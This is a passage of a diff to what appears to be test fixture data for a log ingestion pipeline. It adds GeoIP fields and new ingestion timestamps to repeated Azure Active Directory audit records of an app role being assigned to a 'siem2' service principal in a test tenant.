Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -16314,6 +17346,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -16480,7 +17524,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125335600Z", + "ingested": "2021-12-14T14:48:43.176738309Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -16507,6 +17551,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -16673,7 +17729,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125342100Z", + "ingested": "2021-12-14T14:48:43.176739091Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -16700,6 +17756,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -16866,7 +17934,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125348500Z", + "ingested": "2021-12-14T14:48:43.176739830Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -16893,6 +17961,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -17059,7 +18139,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125354800Z", + "ingested": "2021-12-14T14:48:43.176740836Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
